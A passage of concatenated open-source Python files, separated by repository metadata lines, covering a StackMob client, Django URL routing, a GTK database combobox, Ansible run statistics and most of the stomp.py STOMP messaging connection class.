    def __init__(self, key, secret):
        BaseClient.__init__(self, "push.mob1.stackmob.com", key, secret)
| stackmob/stackmob-python-examples | stackmob/client.py | Python | apache-2.0 | 1,397 | 0.030064 |
from django.conf.urls.defaults import patterns, include, url
from django.utils.functional import curry
from django.views.defaults import server_error, page_not_found
from tracker.api import MemberResource, ReportResource
from tastypie.api import Api
v1_api = Api(api_name='v1')
v1_api.register(MemberResource())
v1_api.register(ReportResource())
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
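# curry() pre-binds template_name below so Django's default error views render
# the admin-styled 500/404 pages instead of the stock templates.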
handler500 = curry(server_error, template_name='admin/500.html')
handler404 = curry(page_not_found, template_name='admin/404.html')
urlpatterns = patterns('tracker.views',
# Examples:
# url(r'^$', 'socialcongress.views.home', name='home'),
url(r'^admin/_update$', 'update', name="update"),
url(r'^admin/chamber/(?P<chamber>[-a-z]+)/$', 'chamber_csv', name='admin_chamber_csv'),
url(r'^admin/weekly/chamber/(?P<chamber>[-a-z]+)/$', 'weekly_csv', name='admin_weekly_csv'),
#url(r'^reports/weeks/$', 'week_index', name='week_index'),
# Uncomment the next line to enable the admin:
url(r'^admin/', include(admin.site.urls)),
# API urls
url(r'^api/', include(v1_api.urls)),
)
| dwillis/socialcongress | tracker/urls.py | Python | unlicense | 1,173 | 0.00682 |
# -*- coding: utf-8 -*-
###############################################################################
# Copyright (C) 2008 EVO Sistemas Libres <[email protected]>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# dbcombobox
# Database gtk.ComboBox widget module
###############################################################################
# GTK Imports
import gobject, gtk
# DBWidget base class
from dbwidgetbase import DBWidgetBase
class DBComboBox(gtk.ComboBox,DBWidgetBase):
"""
Database gtk.ComboBox widget
"""
__gtype_name__ = 'DBComboBox'
# Widget properties
__properties = {
'choices' : (gobject.TYPE_STRING,'Choices','Separated values of choice for the widget (separator character is used as separator)','',gobject.PARAM_CONSTRUCT | gobject.PARAM_READWRITE),
'separator-char' : (gobject.TYPE_STRING,'Separator','Separator character used to separate choice values',',',gobject.PARAM_CONSTRUCT | gobject.PARAM_READWRITE),
}
__properties.update(DBWidgetBase._DBWidgetBase__properties)
__gproperties__ = __properties
def __init__(self,*args,**kwargs):
"""
Class initialization
"""
# Initialize DBWidget base class
DBWidgetBase.__init__(self,*args,**kwargs)
# Initialize parent widget
gtk.ComboBox.__init__(self)
# List store for data
self.__liststore = gtk.ListStore(str,gtk.gdk.Pixbuf)
self.set_model(self.__liststore)
# Cell renderers for combobox
crt = gtk.CellRendererText()
self.pack_start(crt, True)
self.add_attribute(crt, 'text', 0)
crp = gtk.CellRendererPixbuf()
crp.set_property('xalign',1)
self.pack_start(crp, True)
self.add_attribute(crp, 'pixbuf', 1)
# Blank and error pixbufs
self.__blankpixbuf=gtk.gdk.Pixbuf(gtk.gdk.COLORSPACE_RGB,True,8,1,1)
self.__errorpixbuf=self.render_icon(gtk.STOCK_DIALOG_ERROR, gtk.ICON_SIZE_MENU)
# Widget properties
if self.inmediate_validation:
self.connect('changed',self.validate)
def get_widget_data(self):
"""
Returns widget data
"""
iter=self.get_active_iter()
if iter:
return self.__liststore.get_value(iter,0)
else:
return None
def set_invalidated(self):
"""
Set this widget as invalidated
"""
iter=self.__liststore.get_iter_first()
while iter:
self.__liststore.set_value(iter,1,self.__blankpixbuf)
iter=self.__liststore.iter_next(iter)
iter=self.get_active_iter()
if iter:
self.__liststore.set_value(iter,1,self.__errorpixbuf)
def set_validated(self):
"""
Set this widget as validated
"""
self.__validationerrors=[]
iter=self.__liststore.get_iter_first()
while iter:
self.__liststore.set_value(iter,1,self.__blankpixbuf)
iter=self.__liststore.iter_next(iter)
def do_get_property(self, property):
"""
Property getting value handling
"""
if property.name=='choices':
return self.choices
elif property.name=='separator-char':
return self.separator_char
else:
return DBWidgetBase.do_get_property(self, property)
def do_set_property(self, property, value):
"""
Property setting value handling
"""
if property.name=='choices':
self.choices=value
# Set values
self.__liststore.clear()
if value:
for choice in value.split(self.separator_char):
self.__liststore.append([choice,self.__blankpixbuf])
self.set_active(0)
elif property.name=='separator-char':
self.separator_char=value
else:
DBWidgetBase.do_set_property(self, property, value)
gobject.type_register(DBComboBox) | R3v1L/evogtk | evogtk/gui/widgetlib/dbcombobox.py | Python | mit | 4,770 | 0.012159 |
# (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.utils.vars import merge_hash
class AggregateStats:
''' holds stats about per-host activity during playbook runs '''
def __init__(self):
self.processed = {}
self.failures = {}
self.ok = {}
self.dark = {}
self.changed = {}
self.skipped = {}
# user defined stats, which can be per host or global
self.custom = {}
def increment(self, what, host):
''' helper function to bump a statistic '''
self.processed[host] = 1
prev = (getattr(self, what)).get(host, 0)
getattr(self, what)[host] = prev+1
def summarize(self, host):
''' return information about a particular host '''
return dict(
ok = self.ok.get(host, 0),
failures = self.failures.get(host, 0),
unreachable = self.dark.get(host,0),
changed = self.changed.get(host, 0),
skipped = self.skipped.get(host, 0)
)
def set_custom_stats(self, which, what, host=None):
''' allow setting of a custom stat'''
if host is None:
host = '_run'
if host not in self.custom:
self.custom[host] = {which: what}
else:
self.custom[host][which] = what
def update_custom_stats(self, which, what, host=None):
''' allow aggregation of a custom stat'''
if host is None:
host = '_run'
if host not in self.custom or which not in self.custom[host]:
return self.set_custom_stats(which, what, host)
# mismatching types
if type(what) != type(self.custom[host][which]):
return None
if isinstance(what, dict):
self.custom[host][which] = merge_hash(self.custom[host][which], what)
else:
# let overloaded + take care of other types
self.custom[host][which] += what
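# Example of the aggregation semantics (hypothetical stat names and values):
#
#   stats = AggregateStats()
#   stats.update_custom_stats('slow_tasks', 1)        # first call sets -> 1
#   stats.update_custom_stats('slow_tasks', 2)        # numeric += -> 3
#   stats.update_custom_stats('timing', {'db': 1.2})  # dicts use merge_hash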
| alvaroaleman/ansible | lib/ansible/executor/stats.py | Python | gpl-3.0 | 2,779 | 0.009356 |
import math
import random
import re
import socket
import sys
import threading
import time
import types
import xml.dom.minidom
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
try:
import ssl
from ssl import SSLError
DEFAULT_SSL_VERSION = ssl.PROTOCOL_SSLv3
except ImportError: # python version < 2.6 without the backported ssl module
ssl = None
class SSLError:
pass
DEFAULT_SSL_VERSION = None
try:
from socket import SOL_SOCKET, SO_KEEPALIVE
from socket import SOL_TCP, TCP_KEEPIDLE, TCP_KEEPINTVL, TCP_KEEPCNT
LINUX_KEEPALIVE_AVAIL=True
except ImportError:
LINUX_KEEPALIVE_AVAIL=False
import exception
import listener
import utils
from backward import decode, encode, hasbyte, pack, socksend, NULL
try:
import uuid
except ImportError:
from backward import uuid
try:
from fractions import gcd
except ImportError:
from backward import gcd
import logging
log = logging.getLogger('stomp.py')
class Connection(object):
"""
Represents a STOMP client connection.
"""
# ========= PRIVATE MEMBERS =========
# List of all host names (unqualified, fully-qualified, and IP
# addresses) that refer to the local host (both loopback interface
# and external interfaces). This is used for determining
# preferred targets.
__localhost_names = [ "localhost", "127.0.0.1" ]
try:
__localhost_names.append(socket.gethostbyname(socket.gethostname()))
except:
pass
try:
__localhost_names.append(socket.gethostname())
except:
pass
try:
__localhost_names.append(socket.getfqdn(socket.gethostname()))
except:
pass
#
# Used to parse the STOMP "content-length" header lines,
#
__content_length_re = re.compile('^content-length[:]\\s*(?P<value>[0-9]+)', re.MULTILINE)
def __init__(self,
host_and_ports = [ ('localhost', 61613) ],
user = None,
passcode = None,
prefer_localhost = True,
try_loopback_connect = True,
reconnect_sleep_initial = 0.1,
reconnect_sleep_increase = 0.5,
reconnect_sleep_jitter = 0.1,
reconnect_sleep_max = 60.0,
reconnect_attempts_max = 3,
use_ssl = False,
ssl_key_file = None,
ssl_cert_file = None,
ssl_ca_certs = None,
ssl_cert_validator = None,
wait_on_receipt = False,
ssl_version = DEFAULT_SSL_VERSION,
timeout = None,
version = 1.0,
strict = True,
heartbeats = (0, 0),
keepalive = None
):
"""
Initialize and start this connection.
\param host_and_ports
a list of (host, port) tuples.
\param prefer_localhost
if True and the local host is mentioned in the (host,
port) tuples, try to connect to this first
\param try_loopback_connect
if True and the local host is found in the host
tuples, try connecting to it using loopback interface
(127.0.0.1)
\param reconnect_sleep_initial
initial delay in seconds to wait before reattempting
to establish a connection if connection to any of the
hosts fails.
\param reconnect_sleep_increase
factor by which the sleep delay is increased after
each connection attempt. For example, 0.5 means
to wait 50% longer than before the previous attempt,
1.0 means wait twice as long, and 0.0 means keep
the delay constant.
\param reconnect_sleep_max
maximum delay between connection attempts, regardless
of the reconnect_sleep_increase.
\param reconnect_sleep_jitter
random additional time to wait (as a percentage of
the time determined using the previous parameters)
between connection attempts in order to avoid
stampeding. For example, a value of 0.1 means to wait
an extra 0%-10% (randomly determined) of the delay
calculated using the previous three parameters.
\param reconnect_attempts_max
maximum attempts to reconnect
\param use_ssl
connect using SSL to the socket. This wraps the
socket in a SSL connection. The constructor will
raise an exception if you ask for SSL, but it can't
find the SSL module.
\param ssl_cert_file
the path to a X509 certificate
\param ssl_key_file
the path to a X509 key file
\param ssl_ca_certs
            the path to a file containing CA certificates
to validate the server against. If this is not set,
server side certificate validation is not done.
\param ssl_cert_validator
function which performs extra validation on the client
certificate, for example checking the returned
certificate has a commonName attribute equal to the
hostname (to avoid man in the middle attacks).
The signature is:
(OK, err_msg) = validation_function(cert, hostname)
where OK is a boolean, and cert is a certificate structure
as returned by ssl.SSLSocket.getpeercert()
\param wait_on_receipt
if a receipt is specified, then the send method should wait
(block) for the server to respond with that receipt-id
before continuing
\param ssl_version
SSL protocol to use for the connection. This should be
one of the PROTOCOL_x constants provided by the ssl module.
The default is ssl.PROTOCOL_SSLv3
\param timeout
the timeout value to use when connecting the stomp socket
\param version
STOMP protocol version (1.0 or 1.1)
\param strict
if true, use the strict version of the protocol. For STOMP 1.1, this means
it will use the STOMP connect header, rather than CONNECT.
\param heartbeats
a tuple containing the heartbeat send and receive time in millis. (0,0)
if no heartbeats
        \param keepalive
            some operating systems support sending occasional heartbeat
            packets to detect when a connection fails. This parameter can
            either be set to a boolean to turn on the default keepalive
            options for your OS, or to a tuple of values, which also enables
            keepalive packets, but specifies options specific to your OS
            implementation
"""
sorted_host_and_ports = []
sorted_host_and_ports.extend(host_and_ports)
#
# If localhost is preferred, make sure all (host, port) tuples that refer to the local host come first in the list
#
if prefer_localhost:
sorted_host_and_ports.sort(key = self.is_localhost)
#
# If the user wishes to attempt connecting to local ports using the loopback interface, for each (host, port) tuple
# referring to a local host, add an entry with the host name replaced by 127.0.0.1 if it doesn't exist already
#
loopback_host_and_ports = []
if try_loopback_connect:
for host_and_port in sorted_host_and_ports:
if self.is_localhost(host_and_port) == 1:
port = host_and_port[1]
if (not ("127.0.0.1", port) in sorted_host_and_ports
and not ("localhost", port) in sorted_host_and_ports):
loopback_host_and_ports.append(("127.0.0.1", port))
#
# Assemble the final, possibly sorted list of (host, port) tuples
#
self.__host_and_ports = []
self.__host_and_ports.extend(loopback_host_and_ports)
self.__host_and_ports.extend(sorted_host_and_ports)
self.__recvbuf = ''
self.__listeners = {}
self.__reconnect_sleep_initial = reconnect_sleep_initial
self.__reconnect_sleep_increase = reconnect_sleep_increase
self.__reconnect_sleep_jitter = reconnect_sleep_jitter
self.__reconnect_sleep_max = reconnect_sleep_max
self.__reconnect_attempts_max = reconnect_attempts_max
self.__timeout = timeout
self.__connect_headers = {}
if user is not None and passcode is not None:
self.__connect_headers['login'] = user
self.__connect_headers['passcode'] = passcode
self.__socket = None
self.__socket_semaphore = threading.BoundedSemaphore(1)
self.__current_host_and_port = None
self.__receiver_thread_exit_condition = threading.Condition()
self.__receiver_thread_exited = False
self.__send_wait_condition = threading.Condition()
self.__connect_wait_condition = threading.Condition()
self.blocking = None
self.connected = False
# setup SSL
if use_ssl and not ssl:
raise Exception("SSL connection requested, but SSL library not found.")
self.__ssl = use_ssl
self.__ssl_cert_file = ssl_cert_file
self.__ssl_key_file = ssl_key_file
self.__ssl_ca_certs = ssl_ca_certs
self.__ssl_cert_validator = ssl_cert_validator
self.__ssl_version = ssl_version
self.__receipts = {}
self.__wait_on_receipt = wait_on_receipt
# protocol version
self.version = version
self.__strict = strict
# setup heartbeating
if version < 1.1 and heartbeats != (0, 0):
raise exception.ProtocolException('Heartbeats can only be set on a 1.1+ connection')
self.heartbeats = heartbeats
# used for 1.1 heartbeat messages (set to true every time a heartbeat message arrives)
self.__received_heartbeat = time.time()
# flag used when we receive the disconnect receipt
self.__disconnect_receipt = None
# function for creating threads used by the connection
self.create_thread_fc = default_create_thread
self.__keepalive = keepalive
def is_localhost(self, host_and_port):
"""
        Return 1 if the specified host+port refers to the local host, 2 otherwise (these values double as the sort key used to prefer local hosts)
"""
(host, port) = host_and_port
if host in Connection.__localhost_names:
return 1
else:
return 2
def override_threading(self, create_thread_fc):
"""
Override for thread creation. Use an alternate threading library by
setting this to a function with a single argument (which is the receiver loop callback).
The thread which is returned should be started (ready to run)
"""
self.create_thread_fc = create_thread_fc
#
# Manage the connection
#
def start(self):
"""
Start the connection. This should be called after all
listeners have been registered. If this method is not called,
no frames will be received by the connection.
"""
self.__running = True
self.__attempt_connection()
thread = self.create_thread_fc(self.__receiver_loop)
self.__notify('connecting')
def stop(self):
"""
Stop the connection. This is equivalent to calling
disconnect() but will do a clean shutdown by waiting for the
receiver thread to exit.
"""
self.disconnect()
self.__receiver_thread_exit_condition.acquire()
if not self.__receiver_thread_exited:
self.__receiver_thread_exit_condition.wait()
self.__receiver_thread_exit_condition.release()
def get_host_and_port(self):
"""
Return a (host, port) tuple indicating which STOMP host and
port is currently connected, or None if there is currently no
connection.
"""
return self.__current_host_and_port
def is_connected(self):
"""
Return true if the socket managed by this connection is connected
"""
try:
return self.__socket is not None and self.__socket.getsockname()[1] != 0 and self.connected
except socket.error:
return False
#
# Manage objects listening to incoming frames
#
def set_listener(self, name, listener):
"""
Set a named listener on this connection
\see listener::ConnectionListener
\param name the name of the listener
\param listener the listener object
"""
self.__listeners[name] = listener
def remove_listener(self, name):
"""
Remove a listener according to the specified name
\param name the name of the listener to remove
"""
del self.__listeners[name]
def get_listener(self, name):
"""
Return a named listener
\param name the listener to return
"""
if name in self.__listeners:
return self.__listeners[name]
else:
return None
#
# STOMP transmissions
#
def subscribe(self, headers={}, **keyword_headers):
"""
Send a SUBSCRIBE frame to subscribe to a queue
"""
merged_headers = utils.merge_headers([headers, keyword_headers])
required_headers = [ 'destination' ]
if self.version >= 1.1:
required_headers.append('id')
self.__send_frame_helper('SUBSCRIBE', '', merged_headers, required_headers)
def unsubscribe(self, headers={}, **keyword_headers):
"""
Send an UNSUBSCRIBE frame to unsubscribe from a queue
"""
merged_headers = utils.merge_headers([headers, keyword_headers])
self.__send_frame_helper('UNSUBSCRIBE', '', merged_headers, [ ('destination', 'id') ])
def send(self, message='', headers={}, **keyword_headers):
"""
Send a message (SEND) frame
"""
merged_headers = utils.merge_headers([headers, keyword_headers])
if self.__wait_on_receipt and 'receipt' in merged_headers.keys():
self.__send_wait_condition.acquire()
self.__send_frame_helper('SEND', message, merged_headers, [ 'destination' ])
self.__notify('send', headers, message)
# if we need to wait-on-receipt, then block until the receipt frame arrives
if self.__wait_on_receipt and 'receipt' in merged_headers.keys():
receipt = merged_headers['receipt']
while receipt not in self.__receipts:
self.__send_wait_condition.wait()
self.__send_wait_condition.release()
del self.__receipts[receipt]
def ack(self, headers={}, **keyword_headers):
"""
Send an ACK frame, to acknowledge receipt of a message
"""
self.__send_frame_helper('ACK', '', utils.merge_headers([headers, keyword_headers]), [ 'message-id' ])
def nack(self, headers={}, **keyword_headers):
"""
Send an NACK frame, to acknowledge a message was not successfully processed
"""
if self.version < 1.1:
raise RuntimeError('NACK is not supported with 1.0 connections')
self.__send_frame_helper('NACK', '', utils.merge_headers([headers, keyword_headers]), [ 'message-id' ])
def begin(self, headers={}, **keyword_headers):
"""
Send a BEGIN frame to start a transaction
"""
use_headers = utils.merge_headers([headers, keyword_headers])
if not 'transaction' in use_headers.keys():
use_headers['transaction'] = str(uuid.uuid4())
self.__send_frame_helper('BEGIN', '', use_headers, [ 'transaction' ])
return use_headers['transaction']
def abort(self, headers={}, **keyword_headers):
"""
Send an ABORT frame to rollback a transaction
"""
self.__send_frame_helper('ABORT', '', utils.merge_headers([headers, keyword_headers]), [ 'transaction' ])
def commit(self, headers={}, **keyword_headers):
"""
Send a COMMIT frame to commit a transaction (send pending messages)
"""
self.__send_frame_helper('COMMIT', '', utils.merge_headers([headers, keyword_headers]), [ 'transaction' ])
def connect(self, headers={}, **keyword_headers):
"""
Send a CONNECT frame to start a connection
"""
wait = False
if 'wait' in keyword_headers and keyword_headers['wait']:
wait = True
del keyword_headers['wait']
if self.version >= 1.1:
if self.__strict:
cmd = 'STOMP'
else:
cmd = 'CONNECT'
headers['accept-version'] = self.version
headers['heart-beat'] = '%s,%s' % self.heartbeats
else:
cmd = 'CONNECT'
self.__send_frame_helper(cmd, '', utils.merge_headers([self.__connect_headers, headers, keyword_headers]), [ ])
if wait:
self.__connect_wait_condition.acquire()
while not self.is_connected():
self.__connect_wait_condition.wait()
self.__connect_wait_condition.release()
def disconnect_socket(self):
self.__running = False
if self.__socket is not None:
if self.__ssl:
#
# Even though we don't want to use the socket, unwrap is the only API method which does a proper SSL shutdown
#
try:
self.__socket = self.__socket.unwrap()
except Exception:
#
# unwrap seems flaky on Win with the backported ssl mod, so catch any exception and log it
#
_, e, _ = sys.exc_info()
log.warn(e)
elif hasattr(socket, 'SHUT_RDWR'):
try:
self.__socket.shutdown(socket.SHUT_RDWR)
except socket.error:
_, e, _ = sys.exc_info()
log.warn('Unable to issue SHUT_RDWR on socket because of error "%s"' % e)
#
# split this into a separate check, because sometimes the socket is nulled between shutdown and this call
#
if self.__socket is not None:
try:
self.__socket.close()
except socket.error:
_, e, _ = sys.exc_info()
log.warn('Unable to close socket because of error "%s"' % e)
self.__current_host_and_port = None
def disconnect(self, send_disconnect=True, headers={}, **keyword_headers):
"""
Send a DISCONNECT frame to finish a connection
"""
try:
self.__send_frame_helper('DISCONNECT', '', utils.merge_headers([self.__connect_headers, headers, keyword_headers]), [ ])
except exception.NotConnectedException:
_, e, _ = sys.exc_info()
self.disconnect_socket()
raise e
if self.version >= 1.1 and 'receipt' in headers:
self.__disconnect_receipt = headers['receipt']
else:
self.disconnect_socket()
def __convert_dict(self, payload):
"""
Encode a python dictionary as a <map>...</map> structure.
"""
xmlStr = "<map>\n"
for key in payload:
xmlStr += "<entry>\n"
xmlStr += "<string>%s</string>" % key
xmlStr += "<string>%s</string>" % payload[key]
xmlStr += "</entry>\n"
xmlStr += "</map>"
return xmlStr
def __send_frame_helper(self, command, payload, headers, required_header_keys):
"""
Helper function for sending a frame after verifying that a
given set of headers are present.
\param command
the command to send
\param payload
the frame's payload
\param headers
a dictionary containing the frame's headers
\param required_header_keys
a sequence enumerating all required header keys. If an element in this sequence is itself
a tuple, that tuple is taken as a list of alternatives, one of which must be present.
\throws ArgumentError
if one of the required header keys is not present in the header map.
"""
for required_header_key in required_header_keys:
if type(required_header_key) == tuple:
found_alternative = False
for alternative in required_header_key:
if alternative in headers.keys():
found_alternative = True
if not found_alternative:
raise KeyError("Command %s requires one of the following headers: %s" % (command, str(required_header_key)))
elif not required_header_key in headers.keys():
raise KeyError("Command %s requires header %r" % (command, required_header_key))
self.__send_frame(command, headers, payload)
def __send_frame(self, command, headers={}, payload=''):
"""
Send a STOMP frame.
\param command
the frame command
\param headers
a map of headers (key-val pairs)
\param payload
the message payload
"""
if type(payload) == dict:
headers["transformation"] = "jms-map-xml"
payload = self.__convert_dict(payload)
if payload:
payload = encode(payload)
if hasbyte(0, payload):
headers.update({'content-length': len(payload)})
if self.__socket is not None:
try:
frame = [ ]
if command is not None:
frame.append(command + '\n')
for key, val in headers.items():
frame.append('%s:%s\n' % (key, val))
frame.append('\n')
if payload:
frame.append(payload)
if command is not None:
# only send the terminator if we're sending a command (heartbeats have no term)
frame.append(NULL)
frame = pack(frame)
self.__socket_semaphore.acquire()
try:
socksend(self.__socket, frame)
log.debug("Sent frame: type=%s, headers=%r, body=%r" % (command, headers, payload))
finally:
self.__socket_semaphore.release()
except Exception:
_, e, _ = sys.exc_info()
log.error("Error sending frame: %s" % e)
raise e
else:
raise exception.NotConnectedException()
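# For reference, the frame assembled above has the standard STOMP wire shape
# (sketch; the destination and body are illustrative):
#
# SEND\n
# destination:/queue/a\n
# content-length:5\n
# \n
# hello\x00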
def __notify(self, frame_type, headers=None, body=None):
"""
Utility function for notifying listeners of incoming and outgoing messages
\param frame_type
the type of message
\param headers
the map of headers associated with the message
\param body
the content of the message
"""
if frame_type == 'receipt':
# logic for wait-on-receipt notification
self.__send_wait_condition.acquire()
self.__send_wait_condition.notify()
self.__send_wait_condition.release()
receipt = headers['receipt-id']
self.__receipts[receipt] = None
# received a stomp 1.1 disconnect receipt
if receipt == self.__disconnect_receipt:
self.disconnect_socket()
if frame_type == 'connected':
self.connected = True
self.__connect_wait_condition.acquire()
self.__connect_wait_condition.notify()
self.__connect_wait_condition.release()
if 'version' not in headers.keys():
if self.version >= 1.1:
log.warn('Downgraded STOMP protocol version to 1.0')
self.version = 1.0
if 'heart-beat' in headers.keys():
self.heartbeats = utils.calculate_heartbeats(headers['heart-beat'].replace(' ', '').split(','), self.heartbeats)
if self.heartbeats != (0,0):
default_create_thread(self.__heartbeat_loop)
for listener in self.__listeners.values():
if not listener: continue
if not hasattr(listener, 'on_%s' % frame_type):
log.debug('listener %s has no method on_%s' % (listener, frame_type))
continue
if frame_type == 'connecting':
listener.on_connecting(self.__current_host_and_port)
continue
elif frame_type == 'disconnected':
self.connected = False
listener.on_disconnected()
continue
notify_func = getattr(listener, 'on_%s' % frame_type)
notify_func(headers, body)
def __receiver_loop(self):
"""
Main loop listening for incoming data.
"""
log.debug("Starting receiver loop")
try:
try:
while self.__running:
if self.__socket is None:
break
try:
try:
while self.__running:
frames = self.__read()
for frame in frames:
(frame_type, headers, body) = utils.parse_frame(frame)
log.debug("Received frame: %r, headers=%r, body=%r" % (frame_type, headers, body))
frame_type = frame_type.lower()
if frame_type in [ 'connected', 'message', 'receipt', 'error' ]:
self.__notify(frame_type, headers, body)
elif frame_type == 'heartbeat':
# no notifications needed
pass
else:
log.warning('Unknown response frame type: "%s" (frame length was %d)' % (frame_type, len(frame)))
finally:
try:
self.__socket.close()
except:
pass # ignore errors when attempting to close socket
self.__socket = None
self.__current_host_and_port = None
except exception.ConnectionClosedException:
if self.__running:
log.error("Lost connection")
self.__notify('disconnected')
#
# Clear out any half-received messages after losing connection
#
self.__recvbuf = ''
self.__running = False
break
except:
log.exception("An unhandled exception was encountered in the stomp receiver loop")
finally:
self.__receiver_thread_exit_condition.acquire()
self.__receiver_thread_exited = True
self.__receiver_thread_exit_condition.notifyAll()
self.__receiver_thread_exit_condition.release()
log.debug("Receiver loop ended")
def __heartbeat_loop(self):
"""
Loop for sending (and monitoring received) heartbeats
"""
send_sleep = self.heartbeats[0] / 1000
# receive gets an extra grace threshold of 3 seconds
receive_sleep = (self.heartbeats[1] / 1000) + 3
if send_sleep == 0:
sleep_time = receive_sleep
elif receive_sleep == 0:
sleep_time = send_sleep
else:
# sleep for half the GCD of the send and receive intervals
sleep_time = gcd(send_sleep, receive_sleep) / 2
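# Worked example (assuming negotiated heartbeats of (2000, 3000) ms):
# send_sleep = 2, receive_sleep = 3 + 3 = 6, so sleep_time = gcd(2, 6) / 2 = 1
# second, which is frequent enough to service both deadlines.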
send_time = time.time()
receive_time = time.time()
while self.__running:
time.sleep(sleep_time)
if time.time() - send_time > send_sleep:
send_time = time.time()
log.debug('Sending a heartbeat message')
self.__send_frame(None)
if time.time() - receive_time > receive_sleep:
if time.time() - self.__received_heartbeat > receive_sleep:
log.debug('Heartbeat timeout')
# heartbeat timeout
for listener in self.__listeners.values():
listener.on_heartbeat_timeout()
self.disconnect_socket()
self.connected = False
def __read(self):
"""
Read the next frame(s) from the socket.
"""
fastbuf = StringIO()
while self.__running:
try:
c = self.__socket.recv(1024)
c = decode(c)
# reset the heartbeat for any received message
self.__received_heartbeat = time.time()
except Exception:
_, e, _ = sys.exc_info()
c = ''
if len(c) == 0:
raise exception.ConnectionClosedException()
fastbuf.write(c)
if '\x00' in c:
break
elif c == '\x0a':
# heartbeat (special case)
return c
self.__recvbuf += fastbuf.getvalue()
fastbuf.close()
result = []
if len(self.__recvbuf) > 0 and self.__running:
while True:
pos = self.__recvbuf.find('\x00')
if pos >= 0:
frame = self.__recvbuf[0:pos]
preamble_end = frame.find('\n\n')
if preamble_end >= 0:
content_length_match = Connection.__content_length_re.search(frame[0:preamble_end])
if content_length_match:
content_length = int(content_length_match.group('value'))
content_offset = preamble_end + 2
frame_size = content_offset + content_length
if frame_size > len(frame):
#
# Frame contains NUL bytes, need to read more
#
if frame_size < len(self.__recvbuf):
pos = frame_size
frame = self.__recvbuf[0:pos]
else:
#
# Haven't read enough data yet, exit loop and wait for more to arrive
#
break
result.append(frame)
self.__recvbuf = self.__recvbuf[pos+1:]
else:
break
return result
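# Note on the content-length handling above (sketch): a body such as 'a\x00b'
# would otherwise be split at its embedded NUL, so when the headers carry
# 'content-length:3' the frame is extended to cover the whole body before the
# following byte is treated as the frame terminator.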
def __enable_keepalive(self):
def try_setsockopt(sock, name, fam, opt, val):
if val is None:
return True # no value to set always works
try:
sock.setsockopt(fam, opt, val)
log.debug('keepalive: set %r option to %r on socket' % (name, val))
except:
log.error('keepalive: unable to set %r option to %r on socket' % (name,val))
return False
return True
ka = self.__keepalive
if not ka:
return
if ka == True:
ka_sig = 'auto'
ka_args = ()
else:
try:
ka_sig = ka[0]
ka_args = ka[1:]
except Exception:
log.error('keepalive: bad specification %r' % (ka,))
return
if ka_sig == 'auto':
if LINUX_KEEPALIVE_AVAIL:
ka_sig = 'linux'
ka_args = None
log.debug('keepalive: autodetected linux-style support')
else:
log.error('keepalive: unable to detect any implementation, DISABLED!')
return
if ka_sig == 'linux':
log.debug('keepalive: activating linux-style support')
if ka_args is None:
log.debug('keepalive: using system defaults')
ka_args = (None, None, None)
lka_idle, lka_intvl, lka_cnt = ka_args
if try_setsockopt(self.__socket, 'enable', SOL_SOCKET, SO_KEEPALIVE, 1):
try_setsockopt(self.__socket, 'idle time', SOL_TCP, TCP_KEEPIDLE, lka_idle)
try_setsockopt(self.__socket, 'interval', SOL_TCP, TCP_KEEPINTVL, lka_intvl)
try_setsockopt(self.__socket, 'count', SOL_TCP, TCP_KEEPCNT, lka_cnt)
else:
log.error('keepalive: implementation %r not recognized or not supported' % ka_sig)
def __attempt_connection(self):
"""
Try connecting to the (host, port) tuples specified at construction time.
"""
sleep_exp = 1
connect_count = 0
while self.__running and self.__socket is None and connect_count < self.__reconnect_attempts_max:
for host_and_port in self.__host_and_ports:
try:
log.debug("Attempting connection to host %s, port %s" % host_and_port)
self.__socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.__enable_keepalive()
if self.__ssl: # wrap socket
if self.__ssl_ca_certs:
cert_validation = ssl.CERT_REQUIRED
else:
cert_validation = ssl.CERT_NONE
self.__socket = ssl.wrap_socket(self.__socket, keyfile = self.__ssl_key_file,
certfile = self.__ssl_cert_file, cert_reqs = cert_validation,
ca_certs = self.__ssl_ca_certs, ssl_version = self.__ssl_version)
self.__socket.settimeout(self.__timeout)
if self.blocking is not None:
self.__socket.setblocking(self.blocking)
self.__socket.connect(host_and_port)
#
# Validate server cert
#
if self.__ssl and self.__ssl_cert_validator:
cert = self.__socket.getpeercert()
(ok, errmsg) = self.__ssl_cert_validator(cert, host_and_port[0])
if not ok:
raise SSLError("Server certificate validation failed: %s" % errmsg)
self.__current_host_and_port = host_and_port
log.info("Established connection to host %s, port %s" % host_and_port)
break
except socket.error:
self.__socket = None
if isinstance(sys.exc_info()[1], tuple):
exc = sys.exc_info()[1][1]
else:
exc = sys.exc_info()[1]
connect_count += 1
log.warning("Could not connect to host %s, port %s: %s" % (host_and_port[0], host_and_port[1], exc))
if self.__socket is None:
sleep_duration = (min(self.__reconnect_sleep_max,
((self.__reconnect_sleep_initial / (1.0 + self.__reconnect_sleep_increase))
* math.pow(1.0 + self.__reconnect_sleep_increase, sleep_exp)))
* (1.0 + random.random() * self.__reconnect_sleep_jitter))
sleep_end = time.time() + sleep_duration
log.debug("Sleeping for %.1f seconds before attempting reconnect" % sleep_duration)
while self.__running and time.time() < sleep_end:
time.sleep(0.2)
if sleep_duration < self.__reconnect_sleep_max:
sleep_exp += 1
if not self.__socket:
raise exception.ConnectFailedException()
def default_create_thread(callback):
"""
Default thread creation
"""
thread = threading.Thread(None, callback)
